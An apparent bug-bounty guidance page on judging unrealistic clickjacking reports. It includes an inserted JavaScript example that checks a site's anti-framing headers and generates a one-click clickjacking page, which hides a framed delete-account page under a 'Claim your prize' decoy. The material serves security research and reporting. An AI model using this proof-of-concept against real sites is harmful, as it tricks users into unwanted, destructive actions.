Unrealistically complicated clickjacking attacks

Clickjacking attacks rely on an attacker convincing a victim to casually interact with a malicious website, without the victim realizing that some of the clicks are actually delivered to a different, framed origin (typically a page from the target site loaded in an invisible iframe positioned over whatever the victim believes they are clicking).

Some of the reports of clickjacking attacks submitted through our form require exceptionally complex or implausible interactions with the malicious site: say, clicking 10 times, pressing "r", and then hitting Enter. When evaluating reports, we take a pragmatic approach: if we feel that a real-life attack would be very difficult to orchestrate, and the safeguarded functionality is of relatively modest value to the attacker to begin with, we will probably not reward the report.
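
As an added example (not code from this page or from Google's VRP), the following shows what a realistic, one-click clickjacking proof-of-concept looks like, together with the pre-flight check a researcher should run first: whether the target's anti-framing headers (`X-Frame-Options`, CSP `frame-ancestors`) would even let the frame load. The target URL, the attacker origin, the button coordinates and the sample response headers are all constructed for illustration; the source matcher is simplified (it ignores scheme, port and path on host sources).

```javascript
// Added example, not code from the Google VRP page: a one-click clickjacking
// proof-of-concept generator plus a pre-flight check of whether the target's
// anti-framing headers would let the PoC work at all. All URLs, origins and
// response headers below are constructed for illustration.

// Return the origin (scheme://host[:port]) of a URL string.
function originOf(url) {
  return new URL(url).origin;
}

// Does one CSP frame-ancestors source expression allow attackerOrigin to
// embed a page served from targetOrigin? Handles 'none', '*', 'self',
// scheme sources (https:), host sources and wildcard hosts (*.example.com).
// Simplification (assumption): scheme, port and path on host sources are ignored.
function sourceAllows(src, attackerOrigin, targetOrigin) {
  src = src.replace(/^'|'$/g, '').toLowerCase();
  if (src === 'none') return false;
  if (src === '*') return true;
  if (src === 'self') return attackerOrigin === targetOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return attackerOrigin.startsWith(src + '//');
  const attacker = new URL(attackerOrigin);
  const host = src.replace(/^[a-z][a-z0-9+.-]*:\/\//, '');
  if (host.startsWith('*.')) return attacker.host.endsWith(host.slice(1));
  return attacker.host === host;
}

// Decide from the target's response headers whether attackerOrigin can frame
// it. CSP frame-ancestors takes precedence: browsers ignore X-Frame-Options
// when that directive is present. An empty source list matches nothing.
function checkFrameable(headers, attackerOrigin, targetOrigin) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const csp = h['content-security-policy'] || '';
  const fa = csp.split(';').map(d => d.trim()).find(d => /^frame-ancestors(\s|$)/i.test(d));
  if (fa) {
    const sources = fa.split(/\s+/).slice(1);
    const ok = sources.some(s => sourceAllows(s, attackerOrigin, targetOrigin));
    return { frameable: ok, reason: fa };
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return { frameable: false, reason: 'X-Frame-Options: DENY' };
  if (xfo === 'SAMEORIGIN') return { frameable: attackerOrigin === targetOrigin, reason: 'X-Frame-Options: SAMEORIGIN' };
  // ALLOW-FROM is obsolete and ignored by current browsers, so any other
  // value is effectively no protection at all.
  return { frameable: true, reason: xfo ? `unrecognised X-Frame-Options "${xfo}"` : 'no anti-framing header' };
}

// Build the attacker page. The target is framed at opacity 0 and shifted so
// that its sensitive control (at targetButton x/y inside the framed page)
// sits exactly under the visible decoy button: one casual click is enough.
function buildClickjackPoc(targetUrl, targetButton = { x: 0, y: 0 }, decoy = { x: 120, y: 80 }) {
  const safeUrl = targetUrl.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>You won!</title>
<style>
  body { margin: 0; }
  #decoy { position: absolute; left: ${decoy.x}px; top: ${decoy.y}px; z-index: 1; }
  #target { position: absolute; left: ${decoy.x - targetButton.x}px; top: ${decoy.y - targetButton.y}px;
            width: 1000px; height: 800px; border: 0;
            opacity: 0;   /* invisible but still receives the click */
            z-index: 2;   /* stacked above the decoy */ }
</style></head>
<body>
  <button id="decoy">Claim your prize</button>
  <iframe id="target" src="${safeUrl}"></iframe>
</body></html>`;
}

// Tie it together: only emit a PoC when the headers say it can work.
function assessTarget(targetUrl, headers, attackerOrigin, targetButton) {
  const result = checkFrameable(headers, attackerOrigin, originOf(targetUrl));
  return { ...result, poc: result.frameable ? buildClickjackPoc(targetUrl, targetButton) : null };
}

// Constructed sample responses (hypothetical services, not real ones).
const SAMPLE_HEADERS = {
  unprotected: { 'Content-Type': 'text/html' },
  xfoDeny:     { 'X-Frame-Options': 'DENY' },
  cspNone:     { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" },
  cspPartner:  { 'Content-Security-Policy': "frame-ancestors 'self' https://partner.example",
                 'X-Frame-Options': 'DENY' },
};

const TARGET = 'https://target.example/settings/delete-account';
for (const [name, headers] of Object.entries(SAMPLE_HEADERS)) {
  const r = assessTarget(TARGET, headers, 'https://evil.example', { x: 300, y: 420 });
  console.log(`${name}: frameable=${r.frameable} (${r.reason})`);
}
```

The point of the header check is the same pragmatism this section describes: if the target sends `frame-ancestors 'none'` or `X-Frame-Options: DENY`, no amount of decoy design makes the attack real, and if it is frameable, the PoC should need one ordinary click, not a choreographed sequence of clicks and key presses.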

Conclusion

When in doubt, it is always useful to put together a reasonably realistic proof-of-concept exploit and ask yourself or a fellow researcher if they would have fallen for it. If the answer is "no", we'll probably share the sentiment :-).

  • Unrealistic clickjacking and CSRF – ft. Reconless

  • Missing HTTP Security Headers – ft. LiveOverflow

  • Does your vulnerability have any impact? – ft. LiveOverflow